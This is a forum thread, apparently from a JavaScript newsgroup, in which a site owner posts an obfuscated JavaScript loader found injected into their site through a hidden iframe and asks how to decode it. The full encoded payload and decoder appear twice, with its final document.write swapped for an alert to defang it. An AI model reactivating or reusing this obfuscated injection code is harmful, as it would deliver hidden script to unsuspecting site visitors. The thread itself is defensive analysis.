Decoder for obfuscated code?


Z

zsisco

Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.


I want to take a look at the code.

Thanks!


<script language=JavaScript>

function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,

t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63);

for(j=Math.ceil(l/b);j>0;j--) {

r='';
for(i=Math.min(l,b);i>0;i--,l--)

{
w |= (t[x.charCodeAt(p++)-48]) << s;

if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}

alert("LINE: " + r);
}
}


dc("[email protected]@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHNTNY5skkDNzVNAJY6xkrBe4GAq1rEc9kAKkIUWlmDccM2p46AvVXTnBnOxpMNwJ3@[email protected][email protected]@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3CywY8KkYRqB1St8nDcgWAm_mDnC7UcxqQnOaOf9a9mt2SnFYE08H5w8bCIFMDmg3@QsXRdgIRfCrRwWqQjCbOah6Pa8bAoC3CywY8KkYRqB1St8nDcgWAm_mDlWqRnl7PjxqRaOaRvVHEjRnEosH@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQiWqRas2SnFYE08H5w8bCIFMDmg3@[email protected]@pRI6mg3@OJYE08bR9J3UmWqQj17Pjl6Rcx6QnC7OZh6Qq9M2pkbRgxaPedLRc9aPnC7OZ9aS9J3UcxqQn5q90kmDq8rBnBMNb4qKFWXRx1l5XNYPW97StG2SBk29zVVQ8NW3npHzAgl7ot6Sj_l2rFmCLBb@ro34ZFbQgw11JsX7PoIQGFVNod2RidaBjOYADFkDtWFz9RI4oOMQxcWCmNnQCBM4L4WAxBbBhpVBT8YCjpFQGFV@r83D1FbPXNM7exaBHw11eF171w6Sj_79nOnQq912kd25UcX4oG22qpVCj9YQTFV@jlGzTFrQthlRqwaBhG21eFl7es1SjxVSnOnQmo694cmQUcX7ot61QoVCj5V44wa@jWzDTFrQENrRqwaShxqQew671s1Se9XSScqQm8[email protected]@HF798NrQe9Izi5lRewq7ew6Se5zznOnQmsL4ndmQR4FzodLzzoVCj9nQTBb@jWzzjGrQthlRqwLzHVzRewq7e81Sj1zzjdqQ1wq8kd25R4FzoG21ZBbCjObQWxa@[email protected]@[email protected]@JkGz1FbP1zkRqwaBHFkQeF1714zSe5zzCNnQq911jdH7jCb4ot62qpVCj5VQTFV@JkGz1F794glRqwaBit11ewq7es1Sj_r6nOnQmo694c25UcX4oxLTZoVCj5VQnzb@roFzTF794FmRqwLzjtlReRYBsw6SZVVSCNnQqpqQjdmQR4V7oda8qxaPj5V48zb@[email protected]@jGkRTFbQ4gG3q8IzHVzReRYBsw6Sj_79nOYB1sa74c25R4Fzot62qCbCj5VQGBb@jWzD1FrQt1kRqwaBi5lRewq7e4zSe5zzCNnQmwq8kdmCmVnQoxLTZBbCj5VQWxa@S83DjG794FmRqwaSh93ReoWBsw6SiGk6CNYBP8l74c25UcX4oda8qxaPj9nQTBb@[email protected]@jlGzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo69ndH7jCb4oda8qpWPm4V4UBb@S83zTFrQENM7exaBjC2Rew671s1Se9XSjdqQh9l74cmQ8zkQoxLTzoVCj9IQZBb@ZkMzTFbP1zF3qwLzjC2Rew61nt1SZFz9nOnQ1sqBkd25R4FzoG21QBbCjOb4UFV@[email protected]@[email protected][email protected]_r6jdqQm8l74c25UcX7oxLTQoVCj9IQZBb@jWzzTFbP1zF3qwLzi5lReFl7e4zSe9XSjdqQmwa7nd25UcX4oxLTzBbCj5kQYzb@[email protected]@[email protected]@JkGzjGrQtGmRqwaSHVzReFl7e81SiGk6nSG7NsaPLoHQYzkQC8IzAFW7jNlQTJY@FcLNSBMEONnTTzrDHw1RNFl7eJ1AUwV7jGk8pca7tC79TwmEh5GzZoq7khY4Uz76JwW@mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmRTF794Zz5MBrDHFzzzoL4opGQjWn2JslALo694cmCmVIzoG219FW3jpGQhVn2iwW@eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG794Zz5D8r2hp2DAsm7ecm3UVWShtW6PBMNr4W4ZFbBet11kxaPj5VQqNW7gc6CSBb@Ogz5TwX5jtW6Xt2U18LQ34zzJkWBPwq8kdmCmVnEmtkRAFW7eNGQZFV@r83D0oa7NN79nNGzn5W5Pk29jwIQG4zzrsqRv8l7kW15Uc23gw6D8B71Yo24UBb@S83D0Z19jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGTAFW7jNlQTcG6ikMzXpqz1slQRo1RndHTJoWPWx6SZFF2JskQmp69Ssl64BMzCVV@tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFAroIzMF2984[email protected]")

</script>
 
Ad

Advertisements

Z

zsisco

The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!





Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.


I want to take a look at the code.

Thanks!


<script language=JavaScript>

function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,

t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63);

for(j=Math.ceil(l/b);j>0;j--) {

r='';
for(i=Math.min(l,b);i>0;i--,l--)

{
w |= (t[x.charCodeAt(p++)-48]) << s;

if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}

alert("LINE: " + r);
}
}


dc("[email protected]@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHNTNY5skkDNzVNAJY6xkrBe4GAq1rEc9kAKkIUWlmDccM2p46AvVXTnBnOxpMNwJ3@[email protected][email protected]@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3CywY8KkYRqB1St8nDcgWAm_mDnC7UcxqQnOaOf9a9mt2SnFYE08H5w8bCIFMDmg3@QsXRdgIRfCrRwWqQjCbOah6Pa8bAoC3CywY8KkYRqB1St8nDcgWAm_mDlWqRnl7PjxqRaOaRvVHEjRnEosH@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQiWqRas2SnFYE08H5w8bCIFMDmg3@[email protected]@pRI6mg3@OJYE08bR9J3UmWqQj17Pjl6Rcx6QnC7OZh6Qq9M2pkbRgxaPedLRc9aPnC7OZ9aS9J3UcxqQn5q90kmDq8rBnBMNb4qKFWXRx1l5XNYPW97StG2SBk29zVVQ8NW3npHzAgl7ot6Sj_l2rFmCLBb@ro34ZFbQgw11JsX7PoIQGFVNod2RidaBjOYADFkDtWFz9RI4oOMQxcWCmNnQCBM4L4WAxBbBhpVBT8YCjpFQGFV@r83D1FbPXNM7exaBHw11eF171w6Sj_79nOnQq912kd25UcX4oG22qpVCj9YQTFV@jlGzTFrQthlRqwaBhG21eFl7es1SjxVSnOnQmo694cmQUcX7ot61QoVCj5V44wa@jWzDTFrQENrRqwaShxqQew671s1Se9XSScqQm8l74c25R4kQoxLTZBbCjOb48zb@[email protected]@jWzzjGrQthlRqwLzHVzRewq7e81Sj1zzjdqQ1wq8kd25R4FzoG21ZBbCjObQWxa@[email protected]@[email protected]@JkGz1FbP1zkRqwaBHFkQeF1714zSe5zzCNnQq911jdH7jCb4ot62qpVCj5VQTFV@JkGz1F794glRqwaBit11ewq7es1Sj_r6nOnQmo694c25UcX4oxLTZoVCj5VQnzb@roFzTF794FmRqwLzjtlReRYBsw6SZVVSCNnQqpqQjdmQR4V7oda8qxaPj5V48zb@[email protected]@jGkRTFbQ4gG3q8IzHVzReRYBsw6Sj_79nOYB1sa74c25R4Fzot62qCbCj5VQGBb@jWzD1FrQt1kRqwaBi5lRewq7e4zSe5zzCNnQmwq8kdmCmVnQoxLTZBbCj5VQWxa@S83DjG794FmRqwaSh93ReoWBsw6SiGk6CNYBP8l74c25UcX4oda8qxaPj9nQTBb@[email protected]@jlGzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo69ndH7jCb4oda8qpWPm4V4UBb@S83zTFrQENM7exaBjC2Rew671s1Se9XSjdqQh9l74cmQ8zkQoxLTzoVCj9IQZBb@ZkMzTFbP1zF3qwLzjC2Rew61nt1SZFz9nOnQ1sqBkd25R4FzoG21QBbCjOb4UFV@[email protected]@[email protected][email protected]_r6jdqQm8l74c25UcX7oxLTQoVCj9IQZBb@jWzzTFbP1zF3qwLzi5lReFl7e4zSe9XSjdqQmwa7nd25UcX4oxLTzBbCj5kQYzb@[email protected]@[email protected]@JkGzjGrQtGmRqwaSHVzReFl7e81SiGk6nSG7NsaPLoHQYzkQC8IzAFW7jNlQTJY@FcLNSBMEONnTTzrDHw1RNFl7eJ1AUwV7jGk8pca7tC79TwmEh5GzZoq7khY4Uz76JwW@mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmRTF794Zz5MBrDHFzzzoL4opGQjWn2JslALo694cmCmVIzoG219FW3jpGQhVn2iwW@eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG794Zz5D8r2hp2DAsm7ecm3UVWShtW6PBMNr4W4ZFbBet11kxaPj5VQqNW7gc6CSBb@Ogz5TwX5jtW6Xt2U18LQ34zzJkWBPwq8kdmCmVnEmtkRAFW7eNGQZFV@r83D0oa7NN79nNGzn5W5Pk29jwIQG4zzrsqRv8l7kW15Uc23gw6D8B71Yo24UBb@S83D0Z19jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGTAFW7jNlQTcG6ikMzXpqz1slQRo1RndHTJoWPWx6SZFF2JskQmp69Ssl64BMzCVV@tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFAroIzMF2984[email protected]")

</script>
 
D

Dr John Stockton

JRS: In article <[email protected]>,
dated Fri, 22 Sep 2006 13:59:01 remote, seen in
news:comp.lang.javascript, (e-mail address removed) posted :
Lines: 61
The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!

Do not top-post or over-quote - see FAQ.

You can run it yourself and read the alert; or you can safely use a
textarea to display r. Then you will be able to see what it decodes to.


It's a good idea to read the newsgroup and its FAQ.
 
Ad

Advertisements

Z

zsisco

Well genius if you had run it you would have seen that is not the
answer. Jeez, anyone else besides the good doctor have any ideas?
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads


Top